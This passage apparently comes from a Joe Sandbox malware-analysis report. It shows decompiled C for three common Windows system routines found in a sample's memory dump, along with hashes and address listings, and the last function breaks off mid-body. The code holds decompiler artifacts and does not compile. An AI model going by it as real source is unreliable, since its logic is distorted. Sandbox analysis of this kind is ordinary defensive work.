Opcode Fuzzy Hash: 7a38b6af12c412c9093b97415aff6f2137a54f2c9aba9d33239784f8ce3aa3aa
Instruction Fuzzy Hash: 14823A79E003199FEB24DFA9C980BDDB7B1BF49354F10816AEC6AAB250DB309945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 36AE64F0 Relevance: 1.9, APIs: 1, Instructions: 383
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E36AE64F0(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				intOrPtr _v72;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				char _t170;
				signed short _t178;
				signed int _t183;
				intOrPtr* _t185;
				signed int _t191;
				signed int _t197;
				signed int _t198;
				signed int _t202;
				signed int _t206;
				signed int _t209;
				intOrPtr _t211;
				signed int _t231;
				intOrPtr _t232;
				signed int _t241;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				intOrPtr _t248;
				intOrPtr _t250;
				signed int _t252;
				signed int _t260;
				signed int _t262;
				signed int* _t265;
				intOrPtr _t267;
				signed int _t270;
				signed int _t276;
				signed int* _t278;
				signed int* _t281;
				signed int _t282;
				intOrPtr _t284;
				intOrPtr _t285;
				signed int _t286;
				intOrPtr _t289;
				intOrPtr* _t290;
				void* _t292;
				signed int _t293;
				intOrPtr _t297;
				signed int _t300;
				void* _t302;
				intOrPtr _t303;
				signed int _t311;
				signed int _t317;
				void* _t319;

				_t319 = (_t317 & 0xfffffff8) - 0x3c;
				_t241 = 0;
				_v61 = 0;
				_t167 = __ecx + 0xb4;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_v56 = 0;
				_v60 = 0;
				_v24 = _t167;
				if(__edx == _t167) {
					_t168 =  *_t167;
					_v61 = _t168 != 0;
					_v60 = _t168 == 0;
					goto L7;
				} else {
					 *_t167 = 0;
					_t183 =  &_v12;
					_v8 = _t183;
					_v12 = _t183;
					_t185 = __edx + (_a8 * 8 - _a8) * 4;
					_t260 = _a4;
					_v28 = _t185;
					_t300 = _t260;
					 *((intOrPtr*)(_t185 + 4)) =  *((intOrPtr*)(_t185 + 4)) - 1 + _t260;
					_t311 = (_t260 << 4) + __edx;
					_t262 = __edx + 0x10 + (_t260 * 8 - _t260) * 4;
					do {
						_t191 =  *(_t311 - 0x10);
						_t311 = _t311 - 0x10;
						_t262 = _t262 - 0x1c;
						_v32 = _t191;
						_t300 = _t300 - 1;
						_v44 = _t262;
						if(_t191 != 0) {
							if(_v61 != 0) {
								_v36 = _t191 + 0x14;
								E36B28C00(_t262 - 0x10, _t311, "true");
								_t319 = _t319 + 0xc;
								 *((intOrPtr*)(_v44 + 8)) = _v28;
								L36AF2330(_v44, _v36);
								_t265 = _v36 + 0x18;
								_v20 = _t265;
								_t286 = _t265[1];
								_t197 =  *_t265;
								_v24 = _t197;
								if( *_t286 != _t265) {
									L59:
									asm("int 0x29");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t267 = _v72;
									_t198 = _t197 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if(_t198 == 0) {
										 *0x36bd91e0(_t267, _t311);
										return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t267 + 4))))))();
									}
									return _t198;
								} else {
									_t202 = _v44;
									 *_t202 = _t265;
									 *(_t202 + 4) = _t286;
									 *_t286 = _t202;
									_t265[1] = _t202;
									E36AF24D0(_v36);
									_v52 = _v52 + 1;
									if(_v24 != _v20) {
										goto L24;
									} else {
										_t281 = _v8;
										_t197 = _v32 + 0xc;
										_t250 = _v56;
										if( *_t281 !=  &_v12) {
											goto L59;
										} else {
											 *(_t197 + 4) = _t281;
											 *_t197 =  &_v12;
											_t241 = _t250 + 1;
											 *_t281 = _t197;
											_v8 = _t197;
											_v56 = _t241;
											goto L23;
										}
									}
								}
							} else {
								_t282 = _v24;
								_v61 = 1;
								 *_t282 = _t191;
								 *((intOrPtr*)(_t282 + 4)) =  *((intOrPtr*)(_t311 + 4));
								 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t311 + 8));
								 *((intOrPtr*)(_t282 + 0xc)) =  *((intOrPtr*)(_t311 + 0xc));
								L23:
								_t289 = _v48;
								L24:
								_t262 = _v44;
								goto L4;
							}
						} else {
							_t289 = _v48;
							_v60 = 1;
							goto L4;
						}
						goto L72;
						L4:
					} while (_t300 != 0);
					_t206 = _a4 - 1;
					if(_t289 != _t206) {
						_t290 = _v28;
						asm("lock xadd [ecx], eax");
						if((_t206 | 0xffffffff) == 0) {
							_t232 =  *0x36bd6644; // 0x0
							E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t232 + 0x300000,  *_t290);
						}
					}
					if(_t241 != 0) {
						_t209 =  &_v12 - 0xc;
						_t302 = _v12 + 0xfffffff4;
						_t270 = 0xfffffffe;
						_v16 = _t209;
						_t311 = 0;
						_v44 = 0xfffffffe;
						if(_t302 != _t209) {
							_t248 = 0;
							do {
								_t231 = E36B26600(1,  *(_t302 + 4), 0);
								_t270 = _v44;
								_t311 = _t311 | _t231;
								if(_t270 != 0xffffffff) {
									if(_t270 != 0xfffffffe) {
										if(_t270 ==  *(_t302 + 4)) {
											goto L41;
										} else {
											_t270 = _t270 | 0xffffffff;
											goto L40;
										}
										while(1) {
											L48:
											_t197 = _v12;
											if(_t197 ==  &_v12) {
												break;
											}
											_t292 =  *_t197;
											if( *(_t292 + 4) != _t197) {
												goto L59;
											} else {
												_t276 =  *(_t197 + 4);
												if( *_t276 != _t197) {
													goto L59;
												} else {
													 *_t276 = _t292;
													 *(_t292 + 4) = _t276;
													_t293 = _t197;
													_t197 =  *((intOrPtr*)(_t303 + 0x14)) + ( *(_t197 - 8) +  *(_t197 - 8) * 2) * 4;
													_t278 =  *(_t197 + 4);
													if( *_t278 != _t197) {
														goto L59;
													} else {
														 *_t293 = _t197;
														 *(_t293 + 4) = _t278;
														 *_t278 = _t293;
														 *(_t197 + 4) = _t293;
														continue;
													}
												}
											}
											goto L72;
										}
										if(_v52 != 0) {
											_t245 = _v52;
											do {
												asm("bsr esi, ebx");
												E36AF24D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
												asm("btr ebx, esi");
											} while (_t245 != 0);
											_t241 = _v56;
											_t311 = _v40;
										}
										if(_t311 != 0) {
											_t246 = _v40;
											do {
												asm("bsr esi, ebx");
												E36AF24D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
												asm("btr ebx, esi");
											} while (_t246 != 0);
											_t241 = _v56;
										}
										goto L7;
									} else {
										_t270 =  *(_t302 + 4);
										L40:
										_v44 = _t270;
									}
								}
								L41:
								_t302 =  *((intOrPtr*)(_t302 + 0xc)) - 0xc;
							} while (_t302 != _v16);
							_v52 = _t248;
							_t241 = _v56;
							_v40 = _t311;
						}
						_t303 = _a12;
						E36ADBD3D(_t303, _t270);
						_t211 = _v52;
						_v16 = _t311;
						if(_t311 != 0) {
							_t247 = _t311;
							do {
								asm("bsf esi, ebx");
								L36AF2330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
								asm("btr ebx, esi");
							} while (_t247 != 0);
							_t241 = _v56;
							_t311 = _v40;
							_t211 = _v52;
						}
						if(_t211 != 0) {
							_t244 = _v52;
							do {
								asm("bsf esi, ebx");
								L36AF2330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
								asm("btr ebx, esi");
							} while (_t244 != 0);
							_t241 = _v56;
							_t311 = _v40;
						}
						goto L48;
					} else {
						L7:
						_t169 = _a12;
						_t252 =  *(_t169 + 8);
						_t284 =  *((intOrPtr*)(_t169 + 0xc));
						do {
							_t170 =  *((intOrPtr*)(_t169 + 0xe4));
							_t297 = _t284;
							_v32 = _t252;
							_v58 = 0;
							_v59 = 0;
							_v57 = _t170;
							_t285 = _t297 + _t241;
							_v28 = _t285;
							if(_t170 == 0) {
								_t178 = (_t252 - 0x00000001 ^ _t252) & 0x0000ffff ^ _t252;
								_t252 = _t178;
								if(_v60 != 0) {
									_t252 = (_t252 >> 0x00000010) - 0x00000001 << 0x00000010 | _t178 & 0x0000ffff;
								}
								if(_v61 == 0) {
									if(_t285 == 0) {
										_v58 = 1;
										_t252 = _t252 ^ (_t252 + 0x00000001 ^ _t252) & 0x0000ffff;
									} else {
										_t285 = _t285 - 1;
										_v28 = _t285;
									}
								}
								if(_t241 != 0 || _v60 != _t241) {
									if(_t285 != 0) {
										if((_t252 & 0xffff0000) == 0) {
											_t252 = _t252 + 0x10000;
											_v59 = 1;
										}
									}
								}
							}
							_t284 = _t297;
							asm("lock cmpxchg8b [esi]");
							_t241 = _v56;
							_t252 = _v32;
							_t169 = _a12;
						} while (_t252 != _v32 || _t284 != _t297);
						if(_v59 != 0) {
							_push( *((intOrPtr*)(_t169 + 0x24)));
							E36B240A0();
						}
						 *_a16 = _v58;
						return _v57;
					}
				}
				L72:
			}

0x36ae64f8
0x36ae64fc
0x36ae64fe
0x36ae6503
0x36ae6509
0x36ae6511
0x36ae6519
0x36ae6521
0x36ae6525
0x36ae6529
0x36ae6531
0x36b40eef
0x36b40ef3
0x36b40efa
0x00000000
0x36ae6537
0x36ae6537
0x36ae6539
0x36ae653d
0x36ae6541
0x36ae6551
0x36ae6554
0x36ae655a
0x36ae6560
0x36ae6565
0x36ae6573
0x36ae657a
0x36ae6580
0x36ae6580
0x36ae6583
0x36ae6586
0x36ae6589
0x36ae658d
0x36ae658e
0x36ae6594
0x36ae6688
0x36ae6715
0x36ae671e
0x36ae6727
0x36ae6732
0x36ae6735
0x36ae673e
0x36ae6741
0x36ae6745
0x36ae6748
0x36ae674a
0x36ae6750
0x36ae68f1
0x36ae68f6
0x36ae68f8
0x36ae68f9
0x36ae68fa
0x36ae68fb
0x36ae68fc
0x36ae68fd
0x36ae68fe
0x36ae68ff
0x36ae6905
0x36ae6908
0x36ae690b
0x36ae690f
0x36ae691e
0x00000000
0x36ae6926
0x36ae6912
0x36ae6756
0x36ae6756
0x36ae675e
0x36ae6760
0x36ae6763
0x36ae6765
0x36ae6768
0x36ae6776
0x36ae677e
0x00000000
0x36ae6784
0x36ae6784
0x36ae6790
0x36ae6795
0x36ae6799
0x00000000
0x36ae679f
0x36ae67a3
0x36ae67a6
0x36ae67a8
0x36ae67a9
0x36ae67ab
0x36ae67af
0x00000000
0x36ae67af
0x36ae6799
0x36ae677e
0x36ae668e
0x36ae668e
0x36ae6692
0x36ae6697
0x36ae669c
0x36ae66a2
0x36ae66a8
0x36ae66ab
0x36ae66ab
0x36ae66af
0x36ae66af
0x00000000
0x36ae66af
0x36ae659a
0x36ae659a
0x36ae659e
0x00000000
0x36ae659e
0x00000000
0x36ae65a3
0x36ae65a3
0x36ae65aa
0x36ae65ad
0x36ae66f7
0x36ae6701
0x36ae6705
0x36b40f06
0x36b40f1a
0x36b40f1a
0x36ae6705
0x36ae65b5
0x36ae67c0
0x36ae67c3
0x36ae67c6
0x36ae67cb
0x36ae67cf
0x36ae67d1
0x36ae67d7
0x36ae67d9
0x36ae67e0
0x36ae67ea
0x36ae67ef
0x36ae67f3
0x36ae67fa
0x36ae67ff
0x36b40f27
0x00000000
0x36b40f2d
0x36b40f2d
0x00000000
0x36b40f2d
0x36ae6870
0x36ae6870
0x36ae6870
0x36ae687a
0x00000000
0x00000000
0x36ae687c
0x36ae6881
0x00000000
0x36ae6883
0x36ae6883
0x36ae6888
0x00000000
0x36ae688a
0x36ae688a
0x36ae688c
0x36ae688f
0x36ae689a
0x36ae689d
0x36ae68a2
0x00000000
0x36ae68a4
0x36ae68a4
0x36ae68a6
0x36ae68a9
0x36ae68ab
0x00000000
0x36ae68ab
0x36ae68a2
0x36ae6888
0x00000000
0x36ae6881
0x36ae68b5
0x36ae68e8
0x36b40f64
0x36b40f67
0x36b40f76
0x36b40f7b
0x36b40f7e
0x36b40f82
0x36b40f86
0x36b40f86
0x36ae68b9
0x36ae68bf
0x36ae68c3
0x36ae68c6
0x36ae68d3
0x36ae68d8
0x36ae68db
0x36ae68df
0x36ae68df
0x00000000
0x36ae6805
0x36ae6805
0x36ae6808
0x36ae6808
0x36ae6808
0x36ae67ff
0x36ae680c
0x36ae680f
0x36ae6812
0x36ae6818
0x36ae681c
0x36ae6820
0x36ae6820
0x36ae6824
0x36ae682b
0x36ae6830
0x36ae6834
0x36ae683a
0x36ae683c
0x36ae6840
0x36ae6843
0x36ae6850
0x36ae6855
0x36ae6858
0x36ae685c
0x36ae6860
0x36ae6864
0x36ae6864
0x36ae686a
0x36b40f35
0x36b40f39
0x36b40f3c
0x36b40f4b
0x36b40f50
0x36b40f53
0x36b40f57
0x36b40f5b
0x36b40f5b
0x00000000
0x36ae65bb
0x36ae65bb
0x36ae65bb
0x36ae65be
0x36ae65c4
0x36ae65d0
0x36ae65d0
0x36ae65d6
0x36ae65d8
0x36ae65dc
0x36ae65e1
0x36ae65e6
0x36ae65ea
0x36ae65ed
0x36ae65f3
0x36ae65fd
0x36ae6604
0x36ae6606
0x36ae6612
0x36ae6612
0x36ae6619
0x36ae661d
0x36ae66bb
0x36ae66c5
0x36ae6623
0x36ae6623
0x36ae6624
0x36ae6624
0x36ae661d
0x36ae662a
0x36ae6634
0x36ae66d2
0x36ae66d8
0x36ae66de
0x36ae66de
0x36ae66d2
0x36ae6634
0x36ae662a
0x36ae663e
0x36ae6647
0x36ae664b
0x36ae664f
0x36ae6651
0x36ae6654
0x36ae666b
0x36ae66ea
0x36ae66ed
0x36ae66ed
0x36ae6676
0x36ae6680
0x36ae6680
0x36ae65b5
0x00000000

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96aa4989fe08d94e02dcd0c9b6ce9a6ba0ececc5bc6886f668ed917c81f732e8
Instruction ID: 87270ef5b4fae86ef9774b88ad3bd924b300bf724cfa85c38f190f1768fa807d
Opcode Fuzzy Hash: 96aa4989fe08d94e02dcd0c9b6ce9a6ba0ececc5bc6886f668ed917c81f732e8
Instruction Fuzzy Hash: ADE1AE74A18341CFD304CF28C490A5ABBE1FF89358F559A6DF8898B351DB31E916CB92

Uniqueness

Uniqueness Score: -1.00%

Function 36B0E507 Relevance: 1.8, APIs: 1, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E36B0E507(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				char _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				signed int _t78;
				void* _t81;
				char* _t84;
				intOrPtr _t85;
				intOrPtr _t97;
				signed int _t100;
				signed int _t105;
				intOrPtr _t108;
				signed int _t116;
				signed int _t117;
				signed char* _t118;
				signed int _t125;
				signed int _t126;
				signed char* _t127;
				intOrPtr* _t131;
				char* _t132;
				intOrPtr* _t151;
				signed int _t152;
				intOrPtr _t153;
				signed int _t155;
				signed int _t156;

				_t151 = __ecx;
				_t131 = __edx;
				_v28 = __edx;
				_t153 =  *((intOrPtr*)(__ecx + 0x20));
				_v32 =  *((intOrPtr*)(__ecx + 0x60));
				if(E36B0E662(__ecx, 0) != 0) {
					return 0xc000022d;
				} else {
					_t135 =  *((intOrPtr*)(_t153 + 0x18));
					_t6 = _t153 + 0x24; // 0x123
					_t78 = _t6;
					_t146 = _t78;
					_v16 = _t78;
					E36AFDF36( *((intOrPtr*)(_t153 + 0x18)), _t146, 0x14a5);
					_v88 = 0x18;
					_push("true");
					_v84 = 0;
					_pop(0x840);
					if( *0x36bd5d58 != 0) {
					}
				}
				_v76 = 0x840;
				_v80 = _t131;
				_v72 = 0;
				_v68 = 0;
				_t81 = E36AF3C40();
				_t132 = 0x7ffe0384;
				if(_t81 != 0) {
					_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t84 = 0x7ffe0384;
				}
				if( *_t84 != 0) {
					_t85 =  *[fs:0x30];
					__eflags =  *(_t85 + 0x240) & 0x00000004;
					if(( *(_t85 + 0x240) & 0x00000004) != 0) {
						_t126 = E36AF3C40();
						__eflags = _t126;
						if(_t126 == 0) {
							_t127 = 0x7ffe0385;
						} else {
							_t127 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t127 & 0x00000020;
						if(( *_t127 & 0x00000020) != 0) {
							_t146 = _t146 | 0xffffffff;
							_t135 = 0x1485;
							E36B60227(0x1485, _t146, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *( *[fs:0x30] + 0x68) & 0x00040000) != 0) {
					_t135 = _v28;
					_push(0);
					_push(0);
					_push(0);
					_v48 =  *_t135;
					_v44 =  *((intOrPtr*)(_t135 + 4));
					_push("true");
					_push( &_v48);
					_push(0x26);
					E36B24580();
				}
				_v24 = 0;
				while(1) {
					_push("true");
					_push(5);
					_push( &_v64);
					_push( &_v88);
					_push(0x100021);
					_push( &_v12);
					_t155 = E36B22CE0();
					if(_t155 >= 0) {
						break;
					}
					__eflags = _t155 - 0xc0000034;
					if(_t155 == 0xc0000034) {
						L38:
						_t155 = 0xc0000135;
						L39:
						__eflags = _t155;
						if(_t155 < 0) {
							L19:
							return _t155;
						}
						break;
					}
					__eflags = _t155 - 0xc000003a;
					if(_t155 == 0xc000003a) {
						goto L38;
					}
					__eflags = _t155 - 0xc0000022;
					if(_t155 != 0xc0000022) {
						goto L39;
					}
					__eflags = _v24;
					if(__eflags != 0) {
						goto L19;
					}
					_t135 = _t151;
					_t125 = E36B5FBC2(_t151, __eflags);
					__eflags = _t125;
					if(_t125 == 0) {
						goto L19;
					}
					_v24 = 1;
				}
				if( *0x36bd5d3c != 0) {
					_t146 = _v12;
					_t155 = E36B63ECC(_t151, _v12, _t135);
					__eflags = _t155;
					if(_t155 >= 0) {
						goto L10;
					}
					__eflags =  *0x36bd5d10;
					if( *0x36bd5d10 != 0) {
						L18:
						_push(_v12);
						E36B22A80();
						goto L19;
					}
				}
				L10:
				if(( *(_t151 + 0x10) & 0x01000000) != 0) {
					_t97 =  *[fs:0x30];
					__eflags =  *(_t97 + 3) & 0x00000010;
					if(( *(_t97 + 3) & 0x00000010) != 0) {
						goto L11;
					}
					_t146 =  *(_t151 + 0x20);
					_t155 = E36B63E62(_v12,  *(_t151 + 0x20),  &_v36, "true",  &_v5);
					__eflags = _t155;
					if(_t155 < 0) {
						goto L18;
					}
				}
				L11:
				_push(_v12);
				_push("true");
				_push("true");
				_push(0);
				_push(0);
				_push(0xd);
				_push( &_v20);
				_t155 = E36B22E50();
				if(_t155 < 0) {
					__eflags = _t155 - 0xc000047e;
					if(_t155 == 0xc000047e) {
						L56:
						_t100 = E36B5C3B0(_t155);
						_t152 = _v16;
						_t155 = _t100;
						L57:
						E36B1C98F(_t155, 0x1485, 0, _t152);
						goto L18;
					}
					__eflags = _t155 - 0xc000047f;
					if(_t155 == 0xc000047f) {
						goto L56;
					}
					__eflags = _t155 - 0xc0000462;
					if(_t155 == 0xc0000462) {
						goto L56;
					}
					_t152 = _v16;
					__eflags = _t155 - 0xc0000017;
					if(_t155 != 0xc0000017) {
						__eflags = _t155 - 0xc000009a;
						if(_t155 != 0xc000009a) {
							__eflags = _t155 - 0xc000012d;
							if(_t155 != 0xc000012d) {
								_v56 = _t152;
								_push( &_v40);
								_push("true");
								_v52 = _t155;
								_push( &_v56);
								_push("true");
								_push(2);
								_push(0xc000007b);
								_t105 = E36B24020();
								__eflags = _t105;
								if(_t105 >= 0) {
									__eflags =  *0x36bd65f4 - 3;
									if( *0x36bd65f4 != 3) {
										 *0x36bd5a9c =  *0x36bd5a9c + 1;
									}
								}
							}
						}
					}
					goto L57;
				}
				if(E36AF3C40() != 0) {
					_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t132 != 0) {
					_t108 =  *[fs:0x30];
					__eflags =  *(_t108 + 0x240) & 0x00000004;
					if(( *(_t108 + 0x240) & 0x00000004) != 0) {
						_t117 = E36AF3C40();
						__eflags = _t117;
						if(_t117 == 0) {
							_t118 = 0x7ffe0385;
						} else {
							_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t118 & 0x00000020;
						if(( *_t118 & 0x00000020) != 0) {
							E36B60227(0x1486, _t146 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *(_t151 + 0x10) & 0x00000100) != 0) {
					L21:
					__eflags = _t155;
					if(_t155 < 0) {
						goto L17;
					} else {
						goto L16;
					}
				} else {
					if( *0x36bd68e4 != 0) {
						_t156 =  *0x36bd5b64; // 0x0
						asm("ror esi, cl");
						 *0x36bd91e0(_v12, _v28, "true");
						_t116 =  *(_t156 ^  *0x7ffe0330)();
						_t70 = _t116 + 0x3ffffddb; // 0x3ffffddb
						asm("sbb esi, esi");
						_t155 =  ~_t70 & _t116;
						goto L21;
					}
					L16:
					_t155 = E36B01332(_t151, _v20);
					if(_v32 != 0) {
						__eflags = _t155;
						if(_t155 < 0) {
							goto L17;
						}
						 *(_t151 + 0x64) = _v12;
						 *((intOrPtr*)(_t151 + 0xc)) = _v20;
						goto L19;
					}
					L17:
					_push(_v20);
					E36B22A80();
					goto L18;
				}
			}

0x36b0e512
0x36b0e514
0x36b0e518
0x36b0e51e
0x36b0e521
0x36b0e52b
0x00000000
0x36b0e531
0x36b0e531
0x36b0e534
0x36b0e534
0x36b0e53c
0x36b0e53e
0x36b0e541
0x36b0e548
0x36b0e556
0x36b0e558
0x36b0e55b
0x36b0e55c
0x36b0e55c
0x36b0e55c
0x36b0e563
0x36b0e566
0x36b0e569
0x36b0e56c
0x36b0e56f
0x36b0e574
0x36b0e57b
0x36b4f88f
0x36b0e581
0x36b0e581
0x36b0e581
0x36b0e586
0x36b4f899
0x36b4f89f
0x36b4f8a6
0x36b4f8ac
0x36b4f8b1
0x36b4f8b3
0x36b4f8c5
0x36b4f8b5
0x36b4f8be
0x36b4f8be
0x36b4f8ca
0x36b4f8cd
0x36b4f8d9
0x36b4f8dc
0x36b4f8e1
0x36b4f8e1
0x36b4f8cd
0x36b4f8a6
0x36b0e599
0x36b4f8eb
0x36b4f8ee
0x36b4f8ef
0x36b4f8f0
0x36b4f8f3
0x36b4f8f9
0x36b4f8ff
0x36b4f901
0x36b4f902
0x36b4f904
0x36b4f904
0x36b0e59f
0x36b0e5a2
0x36b0e5a2
0x36b0e5a4
0x36b0e5a9
0x36b0e5ad
0x36b0e5ae
0x36b0e5b6
0x36b0e5bc
0x36b0e5c0
0x00000000
0x00000000
0x36b4f90e
0x36b4f914
0x36b4f94b
0x36b4f94b
0x36b4f950
0x36b4f950
0x36b4f952
0x36b0e655
0x00000000
0x36b0e655
0x00000000
0x36b4f958
0x36b4f916
0x36b4f91c
0x00000000
0x00000000
0x36b4f91e
0x36b4f924
0x00000000
0x00000000
0x36b4f926
0x36b4f92a
0x00000000
0x00000000
0x36b4f930
0x36b4f932
0x36b4f937
0x36b4f939
0x00000000
0x00000000
0x36b4f93f
0x36b4f93f
0x36b0e5cd
0x36b4f95d
0x36b4f968
0x36b4f96a
0x36b4f96c
0x00000000
0x00000000
0x36b4f972
0x36b4f979
0x36b0e64d
0x36b0e64d
0x36b0e650
0x00000000
0x36b0e650
0x36b4f97f
0x36b0e5d3
0x36b0e5da
0x36b4f984
0x36b4f98a
0x36b4f98e
0x00000000
0x00000000
0x36b4f994
0x36b4f9a9
0x36b4f9ab
0x36b4f9ad
0x00000000
0x00000000
0x36b4f9b3
0x36b0e5e0
0x36b0e5e0
0x36b0e5e6
0x36b0e5eb
0x36b0e5ed
0x36b0e5ef
0x36b0e5f1
0x36b0e5f3
0x36b0e5f9
0x36b0e5fd
0x36b4f9b8
0x36b4f9be
0x36b4fa1e
0x36b4fa1f
0x36b4fa24
0x36b4fa27
0x36b4fa29
0x36b4fa33
0x00000000
0x36b4fa33
0x36b4f9c0
0x36b4f9c6
0x00000000
0x00000000
0x36b4f9c8
0x36b4f9ce
0x00000000
0x00000000
0x36b4f9d0
0x36b4f9d3
0x36b4f9d9
0x36b4f9db
0x36b4f9e1
0x36b4f9e3
0x36b4f9e9
0x36b4f9ee
0x36b4f9f1
0x36b4f9f2
0x36b4f9f7
0x36b4f9fa
0x36b4f9fb
0x36b4f9fd
0x36b4f9ff
0x36b4fa04
0x36b4fa09
0x36b4fa0b
0x36b4fa0d
0x36b4fa14
0x36b4fa16
0x36b4fa16
0x36b4fa14
0x36b4fa0b
0x36b4f9e9
0x36b4f9e1
0x00000000
0x36b4f9d9
0x36b0e60a
0x36b4fa46
0x36b4fa46
0x36b0e613
0x36b4fa51
0x36b4fa57
0x36b4fa5e
0x36b4fa64
0x36b4fa69
0x36b4fa6b
0x36b4fa7d
0x36b4fa6d
0x36b4fa76
0x36b4fa76
0x36b4fa82
0x36b4fa85
0x36b4fa9b
0x36b4fa9b
0x36b4fa85
0x36b4fa5e
0x36b0e620
0x36b0e65c
0x36b0e65c
0x36b0e65e
0x00000000
0x36b0e660
0x00000000
0x36b0e660
0x36b0e622
0x36b0e629
0x36b4faad
0x36b4fac1
0x36b4fac7
0x36b4facd
0x36b4facf
0x36b4fad7
0x36b4fad9
0x00000000
0x36b4fad9
0x36b0e62f
0x36b0e63d
0x36b0e63f
0x36b4fae0
0x36b4fae2
0x00000000
0x00000000
0x36b4faeb
0x36b4faf1
0x00000000
0x36b4faf1
0x36b0e645
0x36b0e645
0x36b0e648
0x00000000
0x36b0e648

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2ceaa4d975f44cc46e16e0d2d555f496c2a8d5e96f8c7d9c5cc2d704f1b07a
Instruction ID: 7410f169d0ce031d54a34b2c84c19792d88db9b8b7b0507cdc8bd5a089598720
Opcode Fuzzy Hash: 2b2ceaa4d975f44cc46e16e0d2d555f496c2a8d5e96f8c7d9c5cc2d704f1b07a
Instruction Fuzzy Hash: 7FA1F375E00324AFEB12DBA5C844BAEBFB8EF44758F110165EA10AB290DB749D45CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 36AE1051 Relevance: 1.8, APIs: 1, Instructions: 259
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E36AE1051(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				void* _v96;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t151;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				intOrPtr _t160;
				signed int _t161;
				signed int _t172;
				intOrPtr _t180;
				signed int _t195;
				signed int _t196;
				char _t197;
				signed int _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t204;
				intOrPtr* _t206;
				intOrPtr _t207;
				char _t209;
				signed int _t210;
				intOrPtr _t214;
				intOrPtr* _t220;
				signed int _t222;
				signed int _t223;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				intOrPtr _t238;
				signed int _t239;
				void* _t243;
				signed int _t244;
				signed int _t246;
				signed int _t247;

				_t246 = (_t244 & 0xfffffff8) - 0x6c;
				_v8 =  *0x36bdb370 ^ _t246;
				_t238 = __edx;
				_t226 = __ecx;
				_v36 = 0;
				_t204 = 6;
				_t232 =  &_v84;
				_v52 =  *((intOrPtr*)(__ecx + 0x48));
				_v40 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 = __edx;
				_v48 = __ecx;
				_t151 = memset(_t232, 0, _t204 << 2);
				_t247 = _t246 + 0xc;
